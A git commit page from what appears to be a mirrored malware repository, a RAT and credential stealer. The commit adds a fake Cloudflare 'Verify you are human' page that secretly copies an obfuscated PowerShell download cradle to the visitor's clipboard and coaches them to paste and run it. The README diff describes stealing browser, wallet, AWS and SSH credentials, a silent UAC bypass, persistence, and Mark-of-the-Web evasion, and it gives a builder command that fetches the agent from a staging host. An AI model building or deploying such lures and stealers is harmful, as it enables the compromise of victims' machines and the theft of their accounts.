mirror of
https://git.churchofmalware.org/JYenn/Misery
synced 2026-09-22 05:27:07 +00:00
payload wrappers: clickfix_html format - fake Cloudflare 'Verify you are human' page that poisons the clipboard with a hidden PowerShell cradle on the checkbox click and shows Win+R / Ctrl+V / Enter steps; command rides XOR 0x83 + hex like the in-the-wild kits, headless and non-Windows visitors get a benign spinner (per 2026 ClickFix lures: Rapid7 DoubleDonut, MS Threat Intel, PhishEye BW kit); verified 61/61 in the end-to-end harness plus real-JS DOM run (both copy APIs fire, gate works)
This commit is contained in:
@@ -16,7 +16,7 @@ HVNC RAT and stealer research project, derived from Misery. For local testing an
|
||||
- **Credential harvesting**: Chrome, Edge, Brave, Opera, Opera GX, Firefox
|
||||
- **App-session harvesting**: payment cards, Discord, Steam, Telegram, Slack, VS Code, AWS, SSH keys, Wi-Fi passwords, wallet extension paths, Signal session listing
|
||||
- **Encrypted C2 channel**: reverse TCP (default) or HTTPS beaconing through a CDN
|
||||
- **Payload builder** (`setup.py`): msfvenom-style config, ECDH key handling, and `-p` delivery wrappers for `docm`, `xlsm`, `pptm`, `lnk`, `pdf`, `html`, `iso`, `polyglot_exe_zip`, and `polyglot_html`
|
||||
- **Payload builder** (`setup.py`): msfvenom-style config, ECDH key handling, and `-p` delivery wrappers for `docm`, `xlsm`, `pptm`, `lnk`, `pdf`, `html`, `clickfix_html`, `iso`, `polyglot_exe_zip`, and `polyglot_html`
|
||||
- **Keylogger and clipboard monitoring**
|
||||
- **Persistence**: HKCU Run key and WMI event subscriptions
|
||||
- **Elevation** (`elevate`): silent UAC bypass to High via PEB masquerade and CMSTPLUA/ICMLuaUtil, then SYSTEM through SeDebug token theft from a non-PPL system process. Verified on Windows 11 25H2 (build 26200)
|
||||
@@ -63,6 +63,7 @@ dependencies.
|
||||
- `lnk` - shortcut; a hidden PowerShell opens an embedded decoy PDF, then fetches and runs the agent
|
||||
- `pdf` - agent embedded as a PDF attachment, launched on open
|
||||
- `html` - OneDrive-style page; the agent hides in a zip blob behind a button click
|
||||
- `clickfix_html` - fake Cloudflare "Verify you are human" page; checking the box copies a PowerShell command to the clipboard and shows the Win+R / Ctrl+V / Enter steps
|
||||
- `iso` - ISO with the agent inside, sidesteps MOTW
|
||||
- `polyglot_exe_zip` - runs as an exe, opens as a zip holding a `document.pdf.lnk`
|
||||
- `polyglot_html` - runs as an exe, shows a decoy page in a browser
|
||||
@@ -71,11 +72,11 @@ dependencies.
|
||||
python setup.py -t tcp LHOST=10.0.0.5 LPORT=4444 -p docm,iso -o misery STAGE_URL=http://10.0.0.5:8080/misery.exe
|
||||
```
|
||||
|
||||
`-p all` builds every format. The macro and lnk formats fetch the agent from
|
||||
`STAGE_URL` when the target opens them; pdf, html, iso, and the polyglots
|
||||
carry the agent themselves. The macro files ship with decoy content, and the
|
||||
lnk/pdf formats show a decoy document, so they read as normal business
|
||||
documents instead of empty templates.
|
||||
`-p all` builds every format. The macro, lnk, and clickfix formats fetch the
|
||||
agent from `STAGE_URL` when the target opens them; pdf, html, iso, and the
|
||||
polyglots carry the agent themselves. The macro files ship with decoy
|
||||
content, and the lnk/pdf formats show a decoy document, so they read as
|
||||
normal business documents instead of empty templates.
|
||||
|
||||
Delivery note: browsers tag downloaded files with the Mark-of-the-Web
|
||||
(Zone.Identifier), which trips SmartScreen on macros and executables. Extract
|
||||
|
||||
Reference in New Issue
Block a user